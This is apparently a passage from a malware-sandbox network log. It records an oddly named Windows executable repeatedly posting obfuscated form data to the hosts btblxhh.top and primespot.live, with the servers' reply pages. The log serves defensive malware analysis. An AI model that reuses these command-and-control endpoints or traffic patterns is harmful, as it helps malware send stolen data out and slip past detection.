                                                            Data Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e [TRUNCATED]
                                                            Data Ascii: b7e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>404</title><style type="text/css">.concenter-err {width: 100%;background: url(public/static/errpage/error_pic.png);}#warpper {width: 1220px;margin: 0 auto;position: relative;clear: both;font-family: "";}.clearfix {zoom: 1;}.clearfix:after, .clearfix:before {display: block;overflow: hidden;height: 0;content: '\0020';}.error-pic {background: url(public/static/errpage/404.png) no-repeat;}.error-page {width: 658px;height: 641px;margin: 44px auto 0;text-align: center;}.error-page-mb37 {margin-bottom: 37px;}.error-page-txt {padding-top: 391px;margin-bottom: 29px;font-family: \5FAE\8F6F\96C5\9ED1;}.error-page .error-page-txt h3 {font-size: 36px;color: #3B3B3B;font-weight: 900;padding-top: 6px;}.
                                                            Jan 11, 2025 05:44:11.998055935 CET224INData Raw: 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 70 6c 34 38 20 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 38 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74
                                                            Data Ascii: error-page-txt .error-page-pl48 {padding-left: 48px;}.error-page .error-page-txt p {font-size: 16px;color: #6B6B6B;padding-left: 56px;}.error-page-btn {height: 32px;padding-left: 26px;}.error-page-btn a:hover {backgrou
                                                            Jan 11, 2025 05:44:11.998064995 CET1236INData Raw: 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 34 63 37 66 35 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 20 7b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 62 74 6e 20 61 20 7b 64 69 73 70 6c 61 79 3a 20 69
                                                            Data Ascii: nd-color: #64c7f5;}.clearfix:after {clear: both;}.error-page-btn a {display: inline-block;width: 120px;height: 32px;margin: 0 15px;background-color: #70d2ff;color: white;line-height: 32px;font-size: 14px;text-decoration: none;}</style>
                                                            Jan 11, 2025 05:44:11.998155117 CET500INData Raw: 72 76 61 6c 28 69 6e 74 65 72 76 61 6c 43 44 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 69 66 20 28 6f 53 65 63 73 20 3d 3d 20 30 29 7b 0d 0a 20
                                                            Data Ascii: rval(intervalCD); return; } if (oSecs == 0){ clearInterval(intervalCD); window.location.href = __root_dir__+'/'; } document.getElementById('J_countdown').innerHTML = oSec


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.1049990156.234.28.101806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:17.858517885 CET798OUTPOST /dp9c/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.btblxhh.top
                                                            Origin: http://www.btblxhh.top
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.btblxhh.top/dp9c/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 53 4b 38 69 41 4c 55 58 70 32 68 61 4c 72 6c 35 70 76 38 73 31 55 63 4c 61 35 6d 6b 53 33 47 50 54 54 63 6b 6a 41 47 37 37 79 6c 54 6a 53 6e 4d 45 65 35 64 6f 47 41 48 4f 6d 46 74 72 73 69 6f 56 4c 4c 34 76 6b 45 5a 74 4a 66 42 64 45 79 34 64 61 53 66 49 6d 4c 57 57 67 59 35 4f 76 4c 51 58 6c 65 6e 63 63 65 37 46 64 39 2b 51 45 62 51 59 78 70 2b 57 31 42 6e 63 50 4d 4a 63 65 34 52 34 4b 65 66 44 34 62 6b 71 43 52 71 6a 35 31 67 34 73 42 6e 45 44 69 65 68 6e 34 6b 34 51 6e 59 69 4f 41 41 2b 4e 35 31 33 74 6d 6b 46 55 48 56 32 37 71 58 45 4c 51 59 34 65 69 37
                                                            Data Ascii: rFbdy=SK8iALUXp2haLrl5pv8s1UcLa5mkS3GPTTckjAG77ylTjSnMEe5doGAHOmFtrsioVLL4vkEZtJfBdEy4daSfImLWWgY5OvLQXlencce7Fd9+QEbQYxp+W1BncPMJce4R4KefD4bkqCRqj51g4sBnEDiehn4k4QnYiOAA+N513tmkFUHV27qXELQY4ei7
                                                            Jan 11, 2025 05:44:18.744225979 CET1135INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:44:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                            Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.1049991156.234.28.101806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:20.408540010 CET822OUTPOST /dp9c/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.btblxhh.top
                                                            Origin: http://www.btblxhh.top
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.btblxhh.top/dp9c/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 53 4b 38 69 41 4c 55 58 70 32 68 61 4b 50 68 35 75 38 6b 73 69 45 63 55 47 4a 6d 6b 63 58 48 47 54 54 67 6b 6a 44 4c 32 38 41 42 54 6a 79 33 4d 48 66 35 64 6c 6d 41 48 61 57 45 6c 6c 4d 6a 71 56 4c 48 76 76 6c 34 5a 74 4a 4c 42 64 46 43 34 64 70 36 63 4a 32 4c 51 44 51 59 37 4b 76 4c 51 58 6c 65 6e 63 63 61 46 46 64 6c 2b 51 33 54 51 5a 53 78 39 49 46 42 6b 56 76 4d 4a 59 65 34 56 34 4b 66 49 44 35 33 43 71 41 70 71 6a 37 64 67 34 39 42 6d 54 7a 69 63 6c 6e 35 61 7a 42 2f 56 75 4f 41 74 30 63 70 47 31 73 43 2f 43 31 36 53 6e 71 4c 41 58 38 4d 57 32 59 58 52 51 67 44 47 5a 48 75 6b 36 5a 75 74 46 35 72 33 43 50 39 63 6e 77 3d 3d
                                                            Data Ascii: rFbdy=SK8iALUXp2haKPh5u8ksiEcUGJmkcXHGTTgkjDL28ABTjy3MHf5dlmAHaWEllMjqVLHvvl4ZtJLBdFC4dp6cJ2LQDQY7KvLQXlenccaFFdl+Q3TQZSx9IFBkVvMJYe4V4KfID53CqApqj7dg49BmTzicln5azB/VuOAt0cpG1sC/C16SnqLAX8MW2YXRQgDGZHuk6ZutF5r3CP9cnw==
                                                            Jan 11, 2025 05:44:21.251699924 CET1135INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:44:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                            Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.1049992156.234.28.101806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:22.952580929 CET1835OUTPOST /dp9c/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.btblxhh.top
                                                            Origin: http://www.btblxhh.top
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.btblxhh.top/dp9c/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 53 4b 38 69 41 4c 55 58 70 32 68 61 4b 50 68 35 75 38 6b 73 69 45 63 55 47 4a 6d 6b 63 58 48 47 54 54 67 6b 6a 44 4c 32 38 41 4a 54 6a 68 50 4d 48 38 52 64 6b 6d 41 48 5a 57 45 6b 6c 4d 6a 72 56 4c 76 6a 76 6c 31 6b 74 4c 7a 42 66 6a 65 34 62 59 36 63 44 32 4c 51 42 51 59 2b 4f 76 4c 46 58 6c 4f 5a 63 63 4b 46 46 64 6c 2b 51 33 2f 51 5a 42 70 39 4b 46 42 6e 63 50 4d 64 63 65 34 74 34 4b 6e 59 44 35 7a 30 72 77 4a 71 69 62 74 67 35 4c 31 6d 52 54 69 61 6f 48 35 53 7a 42 43 56 75 4f 73 70 30 63 64 38 31 72 32 2f 48 43 4c 65 33 34 32 44 41 4d 45 71 35 72 6d 77 43 31 72 43 61 6b 2b 74 38 4a 53 4a 51 6f 61 61 50 2b 74 53 33 48 55 6e 78 38 54 77 59 61 7a 7a 71 76 32 4e 62 78 4e 74 67 4e 6e 71 33 72 4b 76 32 54 61 79 77 55 65 6a 77 54 59 2b 4a 56 61 33 74 7a 78 44 70 53 63 71 4a 71 79 4d 4d 5a 61 62 31 77 4e 54 57 48 61 4b 61 55 46 4d 68 58 47 7a 43 65 76 61 43 47 33 6a 6c 66 55 4e 55 62 35 72 62 54 36 62 42 46 6e 53 71 55 2f 78 64 2f 45 4c 39 7a 47 76 44 30 39 54 57 68 77 57 6e 61 44 36 [TRUNCATED]
                                                            Data Ascii: rFbdy=SK8iALUXp2haKPh5u8ksiEcUGJmkcXHGTTgkjDL28AJTjhPMH8RdkmAHZWEklMjrVLvjvl1ktLzBfje4bY6cD2LQBQY+OvLFXlOZccKFFdl+Q3/QZBp9KFBncPMdce4t4KnYD5z0rwJqibtg5L1mRTiaoH5SzBCVuOsp0cd81r2/HCLe342DAMEq5rmwC1rCak+t8JSJQoaaP+tS3HUnx8TwYazzqv2NbxNtgNnq3rKv2TaywUejwTY+JVa3tzxDpScqJqyMMZab1wNTWHaKaUFMhXGzCevaCG3jlfUNUb5rbT6bBFnSqU/xd/EL9zGvD09TWhwWnaD6QWjLDSmSq2iwMnrLElFWLiJRx5EaFjIDNYwxepz2h2P9N0gEzv6fTwqxzaAVUOiVHC4bWSoCHUuikqd9YwBhcHsjj8ajI3yG0wivDjZPvNe7/HMurmbvqmiP0TKP+tdbz74XJAc2oXIIEujw1GFoI0WsbzS8c+RjNsRxpnx0rNEPxCVPx3NKygNuGwIxHPDW+CoTBn2y1Wr80+GjPJnm1CtrTAAm62qrsVPgXJuxwFmM0eAOmuvBtkDRPOacydablLxbXL30tk+JPT6n+/ojA4zXfRP2yo7xEm8OeAjEmJZZjEJ36qhih8gCvZH/Nn0PUUZqJOD3ADnE7cGD4gNOpSfWfsOAuGYj/k1EAPmwYwkEYghhgWL3rBqH/5JQsqtt3IKgaB7lgcGtdcbDiop4ijAP6XAVdPLhZTF9ej4cjtvxN1DhvXC6mP00V4ND47lCO3S1yKFum4q9SPYu7ysI89mou3mVa19mUxYFmHUSxG/ohzZ0BtYZde+9jdCn7QApVxrCAsl+5p922e4WJQMhJkYwSI3GvuW8aCh7OVvJXlxMppFZOFZ7yGa3NeSswceVwcdsPILLQtef+pTXe6punUjEDAi5V803Dc/p70/h2FZAChhY887zCRSi7ax1DlKpXMJeRb4cNqumjsyidM+sgCY8OB3q5BQ01a [TRUNCATED]
                                                            Jan 11, 2025 05:44:23.801690102 CET1135INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:44:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                            Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.1049993156.234.28.101806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:25.492981911 CET540OUTGET /dp9c/?UPxHl=S80HqRlhn&rFbdy=fIUCD8Yz2nphKcMxyO4tlSIcMJ/+EEeHC1g1rmDhwR9J1RiwCtlWpXo9Zxpli6GkENLWknkKup+McE28ApWDF3/VOwEaJ+vjCUy5RvaSFOliQEf2CQ== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.btblxhh.top
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Jan 11, 2025 05:44:26.355679989 CET1236INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:44:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Raw: 37 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 32 35 3b 26 23 33 31 30 38 30 3b 26 23 32 33 34 34 38 3b 26 23 33 32 35 39 33 3b 26 23 34 35 3b 26 23 36 35 3b 26 23 38 30 3b 26 23 38 30 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 [TRUNCATED]
                                                            Data Ascii: 71d<!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><title>&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;</title><meta name="keywords" content="&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;"/><meta name="description" content="&#9917;&#65039;&#9917;&#65039;&#9917;&#65039;&#84;&#67;&#71;&#24425;&#31080;&#65;&#80;&#80;&#55356;&#57144;&#121;&#107;&#49;&#56;&#56;&#46;&#99;&#99;&#9989;&#39030;&#32423;&#19979;&#27880;&#24179;&#21488;&#44;&#25552;&#20379;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#44;&#84;&#67;&#71;&#24425;&#31080;&#26368;&#26032;&#23448;&#32593;&#44;&#84;&#67;&#71;&#24425;&#31080;&#97;&#112;&#112;&#19979;&#36733;&#44;&#21508;&#31181;&#23089;&#20048;&#21697;&#31181;&#24212;&#26377;&#23613;&#26377;&#44;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#23448;&#26041;&#23458;&# [TRUNCATED]
                                                            Jan 11, 2025 05:44:26.355731964 CET778INData Raw: 32 34 34 37 3b 26 23 32 30 30 32 36 3b 26 23 32 34 37 34 34 3b 26 23 32 36 33 38 31 3b 26 23 32 31 31 35 33 3b 26 23 33 33 3b 22 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f
                                                            Data Ascii: 2447;&#20026;&#24744;&#26381;&#21153;&#33;"/><script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title =""}</script><script type="text/jav


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.1049994209.74.79.42806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:44:31.547996998 CET807OUTPOST /b8eq/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.primespot.live
                                                            Origin: http://www.primespot.live
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.primespot.live/b8eq/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 74 41 6d 59 64 78 47 65 4f 53 54 77 57 46 55 38 67 5a 74 39 41 31 72 52 4d 39 61 77 34 2b 62 75 38 49 69 65 75 6d 78 44 64 2f 44 31 38 41 55 32 56 6c 38 43 4b 6a 30 76 68 62 71 42 59 78 65 73 69 38 49 56 77 46 6e 46 39 65 68 6a 66 71 39 74 66 75 53 42 50 42 77 56 4c 6f 67 51 65 45 58 77 6b 56 72 64 72 6e 35 47 41 6c 57 4f 48 76 42 49 49 35 79 58 75 4f 68 33 73 43 74 57 45 79 45 56 64 37 58 34 50 63 6f 66 52 53 65 32 4d 30 52 77 35 31 6f 43 72 73 69 53 64 6c 4c 56 52 46 65 31 7a 33 51 33 56 49 39 63 42 6b 73 59 55 4e 4d 67 7a 66 61 32 47 69 52 75 55 4e 54 62
                                                            Data Ascii: rFbdy=tAmYdxGeOSTwWFU8gZt9A1rRM9aw4+bu8IieumxDd/D18AU2Vl8CKj0vhbqBYxesi8IVwFnF9ehjfq9tfuSBPBwVLogQeEXwkVrdrn5GAlWOHvBII5yXuOh3sCtWEyEVd7X4PcofRSe2M0Rw51oCrsiSdlLVRFe1z3Q3VI9cBksYUNMgzfa2GiRuUNTb
                                                            Jan 11, 2025 05:44:32.134721994 CET533INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:44:32 GMT
                                                            Server: Apache
                                                            Content-Length: 389
